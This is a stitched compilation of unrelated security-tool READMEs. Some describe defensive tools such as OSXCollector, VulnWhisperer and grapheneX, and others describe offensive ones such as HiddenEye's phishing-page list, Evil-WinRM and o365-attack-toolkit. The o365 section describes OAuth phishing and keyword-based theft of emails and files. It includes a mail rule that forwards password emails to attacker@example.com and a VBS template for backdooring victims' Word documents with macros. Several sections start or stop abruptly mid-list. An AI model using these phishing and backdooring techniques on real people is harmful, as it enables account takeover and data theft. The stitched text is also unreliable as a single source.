Remove short passwords & duplicates, change lowercase to uppercase & reverse, combine wordlists!
Manual & explanation
-d --dict Specifies the file you want to modify. This is the only parameter / argument that is not optional.
-o --out The output filename (optional). Default is out.txt.
-s --short Removes the lines whose length is shorter than or equal to the specified number. Example: python dm.py -d dictionary.txt -s 5 <- This removes all lines of dictionary.txt with 5 or fewer characters.
-d --dupli Removes duplicate lines. If a line appears more than once, the extra copies are removed. This is done so no password is tried more than once, since that is a waste of time. Example: python dm.py -d wordlist -d
-l --lower Turns all upper-case letters to lower-case. Lower-case letters remain unchanged. Example: python dm.py --lower -d dictionary
-u --upper Turns all lower-case letters to upper-case. Upper-case letters remain unchanged. Example: python dm.py -u -d file.txt
-j --join Joins two files together to create one larger file. Example: python dm.py -d wd1.txt -j wd2.txt <- The result is saved to the second wordlist (wd2.txt)
-c --cut Removes all lines before the line number you specify. Useful if you have already used a large part of the wordlist and do not want to go through the same passwords again. Example: python dm.py --cut rockyou.txt -o cutrocku.txt
-e --exp Shows this message.
-a --arg Shows the arguments & options.
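For illustration, here is a minimal Python sketch of the --short and --dupli operations described above (a hypothetical helper, not the tool's actual source):

# Illustrative sketch only; function and file names are made up.
def clean_wordlist(in_path, out_path="out.txt", min_len=5):
    seen = set()
    with open(in_path) as src, open(out_path, "w") as dst:
        for line in src:
            word = line.rstrip("\n")
            if len(word) <= min_len:   # --short: drop lines with min_len or fewer characters
                continue
            if word in seen:           # --dupli: drop duplicates so no password is tried twice
                continue
            seen.add(word)
            dst.write(word + "\n")     # --upper/--lower would write word.upper()/word.lower()

clean_wordlist("dictionary.txt", "out.txt", min_len=5)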
If you like the project, please give it a +1 star; it motivates me to develop other tools.
SUDO_KILLER SUDO_KILLER is a tool which helps to abuse SUDO in different ways, with the main objective of performing privilege escalation on a Linux environment. The tool helps to identify misconfigurations within sudo rules, vulnerabilities in the version of sudo being used (CVEs) and the use of dangerous binaries, all of which could be abused to elevate privileges to ROOT. SUDO_KILLER will then provide a list of commands or local exploits which could be used to elevate privileges. SUDO_KILLER does not perform any exploitation on your behalf; the exploitation needs to be performed manually, and this is intended. Default usage Example: ./sudo_killer.sh -c -r report.txt -e /tmp/
Arguments
-k : keywords
-e : export location (export /etc/sudoers)
-c : include CVE checks with respect to sudo version
-s : supply user password for sudo checks (not recommended, except for CTF)
-r : report name (save the output)
-h : help
CVEs check To update the CVE database : run the following script ./cve_update.sh
IMPORTANT !!! If you need to input a password to run sudo -l then the script will not work unless you provide the password with the argument -s. NOTE: sudo_killer does not exploit automatically by itself; it was designed like this on purpose. It checks for misconfigurations and vulnerabilities and then proposes the following (if you are lucky, the route to root is near!):
a list of commands to exploit
a list of exploits
some description on how and why the attack could be performed
Why is it possible to run "sudo -l" without a password? By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run "sudo -l" without a password. This behavior may be overridden via the verifypw and listpw options. However, these rules only affect the current user, so if user impersonation is possible (using su), sudo -l should be launched from that user as well. Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without a password.
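As an illustration of the behaviour described above, sudoers entries of this shape produce it (user names and commands are hypothetical, not output of the tool):

alice   ALL=(ALL) NOPASSWD: /usr/sbin/service nginx restart   # a NOPASSWD entry lets alice run "sudo -l" without a password
Defaults:bob listpw = never                                    # listpw/verifypw override that default behaviour per user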
Testing the tool :) Will soon provide a docker to test the different scenarios :) ... Stay connected!
Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:
Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:
Traditional Steam Web Login Page
14) VK PHISHING:
Traditional VK Web Login Page
Advanced Poll Method
15) ICLOUD PHISHING:
Traditional iCloud Web Login Page
16) GitLab PHISHING:
Traditional GitLab Login Page
17) NetFlix PHISHING:
Traditional Netflix Login Page
18) Origin PHISHING:
Traditional Origin Login Page
19) Pinterest PHISHING:
Traditional Pinterest Login Page
20) Protonmail PHISHING:
Traditional Protonmail Login Page
21) Spotify PHISHING:
Traditional Spotify Login Page
22) Quora PHISHING:
Traditional Quora Login Page
23) PornHub PHISHING:
Traditional PornHub Login Page
24) Adobe PHISHING:
Traditional Adobe Login Page
25) Badoo PHISHING:
Traditional Badoo Login Page
26) CryptoCurrency PHISHING:
Traditional CryptoCurrency Login Page
27) DeviantArt PHISHING:
Traditional DeviantArt Login Page
28) DropBox PHISHING:
Traditional DropBox Login Page
29) eBay PHISHING:
Traditional eBay Login Page
30) MySpace PHISHING:
Traditional Myspace Login Page
31) PayPal PHISHING:
Traditional PayPal Login Page
32) Shopify PHISHING:
Traditional Shopify Login Page
33) Verizon PHISHING:
Traditional Verizon Login Page
34) Yandex PHISHING:
Traditional Yandex Login Page
ASCII error fix
Run: dpkg-reconfigure locales
Then select "All locales", then select "en_US.UTF-8". After that, reboot your machine. Then open a terminal and run the command "locale"; you should see "en_US.UTF-8" as the default locale instead of POSIX.
DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of HiddenEye is the COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read the LICENSE.
Dockernymous is a start script for Docker that runs and configures two individual Linux containers in order to act as an anonymization workstation/gateway setup.
It's aimed towards experienced Linux/Docker users, security professionals and penetration testers!
The idea was to create a whonix-like setup (see https://www.whonix.org) that runs on systems which aren't able to efficiently run two hardware virtualized machines or don't have virtualization capacities at all.
Requirements: Host (Linux):
docker
vncviewer
xterm
curl
Gateway Image:
Linux (e.g. Alpine, Debian )
tor
procps
ncat
iptables
Workstation Image:
Linux (e.g. Kali)
xfce4 or another desktop environment (for vnc access)
tightvncserver
Instructions: 1. Host To clone the dockernymous repository type:
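For example (the repository URL is shown generically; substitute the project's actual GitHub location):

git clone https://github.com/<owner>/dockernymous.git
cd dockernymous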
2. Gateway (Alpine): Get a lightweight gateway Image! For example Alpine:
docker pull alpine
Run the image, update the package list, install iptables & tor:
docker run -it alpine /bin/sh
apk add --update tor iptables iproute2
exit
Feel free to further customize the gateway for your needs before you exit. To make this permanent, you have to create a new image from the gateway container we just set up. Each time you run dockernymous, a new container is created from that image and disposed of on exit:
docker commit [Container ID] my_gateway
Get the container ID by running:
docker ps -a
3. Workstation (Kali Linux): Get an image for the Workstation. For example, Kali Linux for penetration testing:
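For example (the image name is an assumption; any Kali-based image with a desktop environment and VNC server will do), pull and prepare it much like the gateway:

docker pull kalilinux/kali-rolling
docker run -it kalilinux/kali-rolling /bin/bash
apt update && apt install -y xfce4 tightvncserver
exit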
As with the gateway, to make this permanent you have to create an image from the customized container. Each time you run dockernymous, a new container is created and disposed of on exit.
$ docker commit [Container ID] my_workstation
Get the container ID by running:
$ docker ps -a
4. Run dockernymous In case you changed the image names to something different (defaults are: "docker_internal" (network), "my_gateway" (gateway), "my_workstation" (you guessed it)), open dockernymous.sh with your favorite editor and update the names in the configuration section. Everything should be set up by now, so let's give it a try! Run dockernymous (don't forget to 'cd' into the cloned folder):
bash dockernymous.sh
or mark it executable once:
chmod +x dockernymous.sh
and always run it with:
./dockernymous.sh
I'm happy to receive feedback. Please remember that dockernymous is still under development. The script is pretty messy, so consider it an alpha-phase project (no versioning yet).
VulnWhisperer is a vulnerability management tool and report aggregator. VulnWhisperer will pull all the reports from the different Vulnerability scanners and create a file with a unique filename for each one, using that data later to sync with Jira and feed Logstash. Jira does a closed cycle full Sync with the data provided by the Scanners, while Logstash indexes and tags all of the information inside the report (see logstash files at /resources/elk6/pipeline/). Data is then shipped to ElasticSearch to be indexed and ends up in a visual and searchable format in Kibana with already defined dashboards.
(Optional) Use a python virtualenv to not mess with host python libraries
virtualenv venv (will create the python 2.7 virtualenv)
source venv/bin/activate (start the virtualenv, now pip will run there and should install libraries without sudo)
deactivate (for quitting the virtualenv once you are done)
Install python libraries requirements
pip install -r /path/to/VulnWhisperer/requirements.txt
cd /path/to/VulnWhisperer
python setup.py install
(Optional) If using a proxy, add the proxy URL as an environment variable.
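For example (hypothetical proxy address):

export HTTP_PROXY=http://proxy.example.com:8080
export HTTPS_PROXY=http://proxy.example.com:8080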
Run To run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line.
(optional flag: -F -> provides "Fancy" log colouring, good for comprehension when manually executing VulnWhisperer)
vuln_whisperer -c configs/frameworks_example.ini -s nessus
or
vuln_whisperer -c configs/frameworks_example.ini -s qualys
If no section is specified (e.g. -s nessus), vulnwhisperer will check on the config file for the modules that have the property enabled=true and run them sequentially.
Next you'll need to import the visualizations into Kibana and set up your logstash config. You can either follow the sample setup instructions [here](https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment) or go for the `docker-compose` solution we offer. Docker-compose ELK is a whole world by itself, and for newcomers to the platform, it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each user's ELK problems, we put together a docker-compose which includes:
VulnWhisperer
Logstash 6.6
ElasticSearch 6.6
Kibana 6.6
The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved and where the config files reside. If run directly after git clone, with just the scanner config added to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it will work out of the box. It also takes care of loading the Kibana dashboards and visualizations automatically through the API, which otherwise needs to be done manually at Kibana's startup. For more info about the docker-compose, check the docker-compose wiki or the FAQ.
Getting Started Our current Roadmap is as follows:
Create a Vulnerability Standard
Map every scanner's results to the standard
Create Scanner module guidelines for easy integration of new scanners (consistency will allow #14)
Refactor the code to reuse functions and enable full compatibility among modules
Change Nessus CSV to JSON (Consistency and Fix #82)
Adapt single Logstash to standard and Kibana Dashboards
Implement Detectify Scanner
Implement Splunk Reporting/Dashboards
On top of this, we try to focus on fixing bugs as soon as possible, which might delay development. PRs are also very welcome, and once we have the new standard implemented, it will be very easy to add compatibility with new scanners. The Vulnerability Standard will initially be a simple one-level JSON with all the information that matches across the different scanners having standardized variable names, while maintaining the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or AWS Vulnerability Schema; we prioritize functionality over perfection.
AMIRA is a service for automatically running the analysis on the OSXCollector output files. The automated analysis is performed via OSXCollector Output Filters, in particular The One Filter to Rule Them All: the Analyze Filter. AMIRA takes care of retrieving the output files from an S3 bucket, running the Analyze Filter and then uploading the results of the analysis back to S3 (although one could envision as well attaching them to the related JIRA ticket).
Prerequisites
tox The following steps assume you have tox installed on your machine. If this is not the case, please run:
$ sudo pip install tox
OSXCollector Output Filters configuration file AMIRA uses OSXCollector Output Filters to do the actual analysis, so you will need to have a valid osxcollector.yaml configuration file in the working directory. The example configuration file can be found in the OSXCollector Output Filters. The configuration file mentions the location of the file hash and the domain blacklists. Make sure that the blacklist locations mentioned in the configuration file are also available when running AMIRA.
AWS credentials AMIRA uses boto to interface with AWS. You can supply the credentials using either of the possible boto config files. The credentials should allow reading and deleting SQS messages from the SQS queue specified in the AMIRA config as well as the read access to the objects in the S3 bucket where the OSXCollector output files are stored. To be able to upload the analysis results back to the S3 bucket specified in the AMIRA configuration file, the credentials should also allow write access to this bucket.
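For example, a minimal boto credentials file could look like this (placeholder values; any of the standard boto config locations works):

[Credentials]
aws_access_key_id = <YOUR_ACCESS_KEY_ID>
aws_secret_access_key = <YOUR_SECRET_ACCESS_KEY>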
AMIRA Architecture The service uses the S3 bucket event notifications to trigger the analysis. You will need to configure an S3 bucket for the OSXCollector output files, so that when a file is added there the notification will be sent to an SQS queue (AmiraS3EventNotifications in the picture below). AMIRA periodically checks the queue for any new messages and upon receiving one it will fetch the OSXCollector output file from the S3 bucket. It will then run the Analyze Filter on the retrieved file. The Analyze Filter runs all the filters contained in the OSXCollector Output Filters package sequentially. Some of them communicate with the external resources, like domain and hashes blacklists (or whitelists) and threat intel APIs, e.g. VirusTotal, OpenDNS Investigate or ShadowServer. The original OSXCollector output is extended with all of this information and the very last filter run by the Analyze Filter summarizes all of the findings into a human-readable form. After the filter finishes running, the results of the analysis will be uploaded to the Analysis Results S3 bucket. The overview of the whole process and the system components involved in it are depicted below:
Using AMIRA The main entry point to AMIRA is in the amira/amira.py module. You will first need to create an instance of AMIRA class by providing the AWS region name, where the SQS queue with the event notifications for the OSXCollector output bucket is, and the SQS queue name:
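A minimal sketch of what that looks like (the run() call and exact argument names are assumptions based on this description; check amira/amira.py for the actual API):

from amira.amira import AMIRA

# region of the SQS queue receiving the S3 event notifications, and the queue name
app = AMIRA('us-west-1', 'AmiraS3EventNotifications')
app.run()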
To filter MAC vendors, please check the number in mac_vendors.py. This last option can return unwanted devices, as it is based on the following prefixes, which I have not validated:
Description & Purpose This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators. This program can be used on any Microsoft Windows server with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.
If you don't want to put the password in clear text, you can omit the -p argument; the password will then be prompted for and will not be shown. To use IPv6, the address must be added to /etc/hosts.
upload: local files can be auto-completed using the tab key. It is not necessary to set remote_path if the local file is in the same directory as evil-winrm.rb.
usage: upload local_path remote_path
download: it is not necessary to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
menu: loads the Invoke-Binary and l04d3r-LoadDll functions that we explain below. When a ps1 is loaded, all its functions will be shown.
To load a ps1 file you just have to type its name (auto-completion using the tab key is allowed). The scripts must be in the path set with the -s argument. Type menu again to see the loaded functions.
Invoke-Binary: allows executables compiled from C# to be executed in memory. The name can be auto-completed using the tab key and up to 3 parameters are allowed. The executables must be in the path set with the -e argument.
l04d3r-LoadDll: allows loading DLL libraries in memory; it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll")). The DLL file can be hosted over SMB, HTTP or locally. Once it is loaded, type menu; then it is possible to autocomplete all functions.
Disclaimer & License This script is licensed under LGPLv3+. Direct link to License. Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.
o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information. Some of the implemented features are :
Phishing endpoint The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.
Backend services Afterward, the token will be used by the backend services to perform the defined attacks.
Management interface The management interface can be utilized to inspect the extracted information from the Microsoft Graph API.
Features
Outlook Keyworded Extraction User emails can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the emails that match it will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.
Onedrive/Sharepoint Keyworded Extraction Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the documents that match it will be downloaded and saved locally. The operator can examine the documents using the management interface.
Outlook Rules Creation Microsoft Graph API supports the creation of Outlook rules. You can define different rules by putting the rule JSON files in the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs Below is an example rule that, when loaded, will forward every email that contains "password" in the body to attacker@example.com.
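An illustrative rule of that shape, following the Graph API messageRule schema linked above (field values are examples only; check the linked documentation for the exact schema):

{
  "displayName": "Forward password emails",
  "sequence": 1,
  "isEnabled": true,
  "conditions": {
    "bodyContains": [ "password" ]
  },
  "actions": {
    "forwardTo": [
      { "emailAddress": { "address": "attacker@example.com" } }
    ],
    "stopProcessingRules": false
  }
}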
Word Document Macro Backdooring User documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported in Word. It should be noted that after backdooring, the documents can no longer be edited online, which increases the chances of our payload executing. This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built from the template below and executed, so don't panic if you see wscript.exe running.
Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("{DOCUMENT}")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"
wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0
wdApp.Quit
How to set up
Compile
cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep ensure
go build
Configuration An example configuration is shown below:
Deployment Before you start using this toolkit, you need to create an application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.
After creating the application, copy the Application ID and change it in static/index.html. The URL (external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.
It should be noted that you can run this tool on any operating system that Go supports, but the Macro Backdooring functionality will only work on Windows. The look of the phishing page can be changed in static/index.html.
Security Considerations Apart from all the features this tool has, it also opens some attack surface on the host running the tool. Firstly, the Macro Backdooring Functionality will open the word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files which will be saved on your computer. The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and Microsoft Graph API.
Management Interface The management interface allows the operator to browse the data that has been extracted.
In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.
Although current technology tries to design systems to be as safe as possible, security flaws and situations that can lead to vulnerabilities caused by unconscious use and missing configurations still exist. The user must be knowledgeable about the technical side of system architecture and should be aware of the importance of securing his/her system from vulnerabilities like this. Unfortunately, it's not possible for every ordinary user to know all the details about hardening and the necessary commands, and hardening remains a technical issue due to the difficulty of understanding operating system internals. Therefore there are hardening checklists available on the internet that contain various commands and rules for a specified operating system, such as trimstray/linux-hardening-checklist & Windows Server Hardening Checklist, providing a set of commands with their sections and of course simplifying the concept for the end user. But still, the user must know the commands and apply the hardening manually depending on the system. That's exactly where grapheneX comes into play.
The project name is derived from the 'graphene'. Graphene is a one-atom-thick layer of carbon atoms arranged in a hexagonal lattice. In proportion to its thickness, it is about 100 times stronger than the strongest steel.
The grapheneX project aims to provide a framework for securing the system with hardening commands automatically. It's designed for the end user as well as for Linux and Windows developers due to the interface options (interactive shell/web interface). In addition to that, grapheneX can be used to secure a web server/application. Hardening commands and the scopes of those commands are referred to as modules and namespaces in the project. They exist in the modules.json file after installation ($PYPATH/site-packages/graphenex/modules.json). Additionally, it's possible to add, edit or remove modules and namespaces. Also, the hardening operation can be automated with presets that contain a list of modules. Currently, grapheneX supports the hardening sections below. Each of these namespaces contains more than one module.
Firewall
User
Network
Services
Kernel
Filesystem
Other
Installation You can install grapheneX with pip. Usually this is the easiest way:
pip install graphenex
Also it's possible to run the setup.py for installation as follows:
python setup.py install
The commands below can be used for testing the project without installation:
cd grapheneX
pipenv install
pipenv run python -m graphenex
positional arguments: host:port host and port to run the web interface
optional arguments: -h, --help show this help message and exit -v, --version show version information -w, --web run the grapheneX web server --open open browser on web server start
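For example, based on the usage above, the web interface can be started like this (host and port are arbitrary examples):

grapheneX -w localhost:8080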
Interactive Shell Execute grapheneX.py in order to start the interactive shell.
Animated GIFs and screenshots are included for demonstration and show the test execution of the unversioned grapheneX. Use the grapheneX or python -m graphenex command for execution.
preset grapheneX has presets that contain particular modules for automating the hardening operation. Presets can be customized with the modules.json file and they can contain any supported module. preset command shows the available module presets and preset [PRESET] runs the hardening commands in a preset.
preset command supports autocomplete for preset names. Also, it supports an option for asking permission between each hardening command execution so that the user knows what he/she is doing.
Adding module presets
Presets are stored in the presets element inside the modules.json file. This JSON file can be edited for updating the presets.
grapheneX stores the modules and namespaces in the modules.json file. A new module will show up when a new element is created in this JSON file. An example element is given below.
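An element of roughly this shape (the keys and values shown here are illustrative; check the modules.json shipped with your installation for the exact field names):

{
  "name": "Example_Module",
  "desc": "Disables an example kernel setting.",
  "command": "sysctl -w net.ipv6.conf.all.disable_ipv6=1",
  "require_superuser": "True",
  "target_os": "linux"
}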
Choosing the remove option in the manage menu will be enough for removing the specified module. It's also possible to remove the module from modules.json manually.
Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.
Also create an empty text file called none.txt in the data folder, so that it doesn't do a subdomain brute-force when testing.
Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.
If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file.
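For example, a hosts file entry of this shape does the job (the IP address is a documentation placeholder and the domain is hypothetical):

203.0.113.25    targetdomain.com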
Introduction Orbit is designed to explore network of a blockchain wallet by recursively crawling through transaction history. The data is rendered as a graph to reveal major sources, sinks and suspicious connections.
Orbit's default crawling depth is 3, i.e. it fetches the history of the target wallet(s), crawls the newly found wallets, and then crawls the wallets in that result again. The crawling depth can be increased or decreased with the -d option.
Wallets that have made just a couple of interactions with our target may not be important, so Orbit can be told to crawl only the top N wallets at each level by using the -t option.
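A typical invocation would combine these options, roughly like the following (the flag for the target wallet is an assumption; check the tool's --help for the exact syntax):

python3 orbit.py -s <wallet_address> -d 2 -t 20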
Visualization Once the scan is complete, the graph will automatically open in your default browser. If it doesn't open, open quark.html manually. Don't worry if your graph looks messy like the one below or worse.
Select the Make Clusters option to form clusters using a community detection algorithm. After that, you can use Color Clusters to give a different color to each community and then use the Spacify option to fix overlapping nodes & edges.
The thickness of edges depends on the frequency of transactions between two wallets while the size of a node depends on both transaction frequency and the number of connections of the node. As Orbit uses Quark to render the graph, more information about the various features and controls is available in Quark's README.
This application and exercises will take you through some of the OWASP top 10 Vulnerabilities and how to prevent them.
Up and running
Install Docker for MacOS or Windows. You'll need to create a Docker account if you don't already have one.
git clone git://github.com/ScaleSec/vulnado
cd vulnado
docker-compose up
Open a browser and navigate to the client to make sure it's working: http://localhost:1337
Then back in your terminal verify you have connection to your API server: nc -vz localhost 8080
Architecture The docker network created by docker-compose maps pretty well to a multi-tier architecture where a web server is publicly available and there are other network resources like a database and internal site that are not publicly available.
OSXCollector is a forensic evidence collection & analysis toolkit for OSX.
Forensic Collection The collection script runs on a potentially infected machine and outputs a JSON file that describes the target machine. OSXCollector gathers information from plists, SQLite databases and the local file system. Forensic Analysis Armed with the forensic collection, an analyst can answer questions like:
Is this machine infected?
How'd that malware get there?
How can I prevent and detect further infection?
Yelp automates the analysis of most OSXCollector runs converting its output into an easily readable and actionable summary of just the suspicious stuff. Check out OSXCollector Output Filters project to learn how to make the most of the automated OSXCollector output analysis.
Performing Collection osxcollector.py is a single Python file that runs without any dependencies on a standard OSX machine. This makes it really easy to run collection on any machine - no fussing with brew, pip, config files, or environment variables. Just copy the single file onto the machine and run it: sudo osxcollector.py is all it takes.
$ sudo osxcollector.py Wrote 35394 lines. Output in osxcollect-2014_12_21-08_49_39.tar.gz
If you have just cloned the GitHub repository, osxcollector.py is inside osxcollector/ directory, so you need to run it as:
$ sudo osxcollector/osxcollector.py
IMPORTANT: please make sure that python command on your Mac OS X machine uses the default Python interpreter shipped with the system and is not overridden, e.g. by the Python version installed through brew. OSXCollector relies on a couple of native Python bindings for OS X libraries, which might be not available in other Python versions than the one originally installed on your system. Alternatively, you can run osxcollector.py explicitly specifying the Python version you would like to use:
The JSON output of the collector, along with some helpful files like system logs, has been bundled into a .tar.gz for hand-off to an analyst. osxcollector.py also has a lot of useful options to change how collection works:
-i INCIDENT_PREFIX/--id=INCIDENT_PREFIX: Sets an identifier which is used as the prefix of the output file. The default value is osxcollect.
$ sudo osxcollector.py -i IncontinentSealord Wrote 35394 lines. Output in IncontinentSealord-2014_12_21-08_49_39.tar.gz
Get creative with incident names, it makes it easier to laugh through the pain.
-p ROOTPATH/--path=ROOTPATH: Sets the path to the root of the filesystem to run collection on. The default value is /. This is great for running collection on the image of a disk.
$ sudo osxcollector.py -p '/mnt/powned'
-s SECTION/--section=SECTION: Runs only a portion of the full collection. Can be specified more than once. The full list of sections and subsections is:
-c/--collect-cookies: Collect cookies' value. By default OSXCollector does not dump the value of a cookie, as it may contain sensitive information (e.g. session id).
-l/--collect-local-storage: Collect the values stored in web browsers' local storage. By default OSXCollector does not dump the values as they may contain sensitive information.
-d/--debug: Enables verbose output and python breakpoints. If something is wrong with OSXCollector, try this.
$ sudo osxcollector.py -d
Details of Collection The collector outputs a .tar.gz containing all the collected artifacts. The archive contains a JSON file with the majority of information. Additionally, a set of useful logs from the target system logs are included.
Common Keys
Every Record Each line of the JSON file records one piece of information. There are some common keys that appear in every JSON record (an illustrative record follows the list below):
osxcollector_incident_id: A unique ID shared by every record.
osxcollector_section: The section or type of data this record holds.
osxcollector_subsection: The subsection or more detailed descriptor of the type of data this record holds.
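For illustration, a single record carrying these common keys might look like this (field values are made up, and real records carry many more fields):

{"osxcollector_incident_id": "osxcollect-2014_12_21-08_49_39", "osxcollector_section": "startup", "osxcollector_subsection": "launch_agents", "file_path": "/Library/LaunchAgents/com.example.agent.plist"}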
File Records For records representing files there are a bunch of useful keys:
atime: The file accessed time.
ctime: The file creation time.
mtime: The file modified time.
file_path: The absolute path to the file.
md5: MD5 hash of the file contents.
sha1: SHA1 hash of the file contents.
sha2: SHA2 hash of the file contents.
For records representing downloaded files:
xattr-wherefrom: A list containing the source and referrer URLs for the downloaded file.
xattr-quarantines: A string describing which application downloaded the file.
SQLite Records For records representing a row of a SQLite database:
osxcollector_table_name: The table name the row comes from.
osxcollector_db_path: The absolute path to the SQLite file.
For records that represent data associated with a specific user:
osxcollector_username: The name of the user
Timestamps OSXCollector attempts to convert timestamps to human readable date/time strings in the format YYYY-mm-dd hh:MM:ss. It uses heuristics to automatically identify various timestamps (a sketch of the idea follows the list below):
seconds since epoch
milliseconds since epoch
seconds since 2001-01-01
seconds since 1601-01-01
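A minimal Python sketch of that heuristic (illustrative only, not OSXCollector's actual code):

from datetime import datetime, timedelta

EPOCHS = [
    (datetime(1970, 1, 1), 1.0),     # seconds since epoch
    (datetime(1970, 1, 1), 1000.0),  # milliseconds since epoch
    (datetime(2001, 1, 1), 1.0),     # seconds since 2001-01-01 (Apple absolute time)
    (datetime(1601, 1, 1), 1.0),     # seconds since 1601-01-01 (Windows-style)
]

def guess_datetime(raw_value):
    # Try each interpretation and keep the first one that lands in a plausible range.
    for epoch, divisor in EPOCHS:
        try:
            candidate = epoch + timedelta(seconds=raw_value / divisor)
        except OverflowError:
            continue
        if datetime(2004, 1, 1) <= candidate <= datetime(2030, 1, 1):
            return candidate.strftime('%Y-%m-%d %H:%M:%S')
    return None

print(guess_datetime(1419151779))  # -> a 2014 date when read as seconds since epoch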
Sections
version section The current version of OSXCollector.
system_info section Collects basic information about the system:
system name
node name
release
version
machine
kext section Collects the Kernel extensions from:
/System/Library/Extensions
/Library/Extensions
startup section Collects information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, StartupItems and other login items from:
applications section Hashes installed applications and gathers install history from:
/Applications
~/Applications
/Library/Receipts/InstallHistory.plist
quarantines section Quarantines are basically the info necessary to show the 'Are you sure you wanna run this?' prompt when a user is trying to open a file downloaded from the Internet. For some more details, check out the Apple Support explanation of Quarantines: http://support.apple.com/kb/HT3662 This section also collects information from the XProtect hash-based malware check for quarantined files. The plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist XProtect also adds minimum versions for Internet plugins. That plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.meta.plist
downloads section Hashes all users' downloaded files from:
mail section Hashes files in the mail app directories:
~/Library/Mail
~/Library/Mail Downloads
full_hash section Hashes all the files on disk. All of 'em. This does not run by default. It must be triggered with:
$ sudo osxcollector.py -s full_hash
Basic Manual Analysis Forensic analysis is a bit of art and a bit of science. Every analyst will see a bit of a different story when reading the output from OSXCollector. That's part of what makes analysis fun. Generally, collection is performed on a target machine because something is hinky: anti-virus found a file it doesn't like, deep packet inspection observed a callout, endpoint monitoring noticed a new startup item. The details of this initial alert - a file path, a timestamp, a hash, a domain, an IP, etc. - are enough to get going.
Timestamps Simply grepping a few minutes before and after a timestamp works great:
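For example, after extracting the .tar.gz (the file name follows the sample output above; adjust it to your own run):

grep '2014-12-21 08:4' osxcollect-2014_12_21-08_49_39.json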
Automated Analysis The OSXCollector Output Filters project contains filters that process and transform the output of OSXCollector. The goal of filters is to make it easy to analyze OSXCollector output.
Development Tips The functionality of OSXCollector is stored in a single file: osxcollector.py. The collector should run on a naked install of OS X without any additional packages or dependencies. Ensure that all of the OSXCollector tests pass before editing the source code. You can run the tests using: make test After making changes to the source code, run make test again to verify that your changes did not break any of the tests.
A native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
Introduction
uncompyle6 translates Python bytecode back into equivalent Python source code. It accepts bytecodes from Python version 1.3 to version 3.8, spanning over 24 years of Python releases. We include Dropbox's Python 2.5 bytecode and some PyPy bytecode.
Why this? Ok, I'll say it: this software is amazing. It is more than your normal hacky decompiler. Using compiler technology, the program creates a parse tree of the program from the instructions; nodes at the upper levels look a little like what might come from a Python AST. So we can really classify and understand what's going on in sections of Python bytecode.
Building on this, another thing that makes this different from other CPython bytecode decompilers is the ability to deparse just fragments of source code and give source-code information around a given bytecode offset. I use the tree fragments to deparse fragments of code at run time inside my trepan debuggers. For that, bytecode offsets are recorded and associated with fragments of the source code. This purpose, although compatible with the original intention, is yet a little bit different. See this for more information.
Python fragment deparsing given an instruction offset is useful in showing stack traces and can be incorporated into any program that wants to show a location in more detail than just a line number at runtime. This code can also be used when source-code information does not exist and there is just bytecode. Again, my debuggers make use of this.
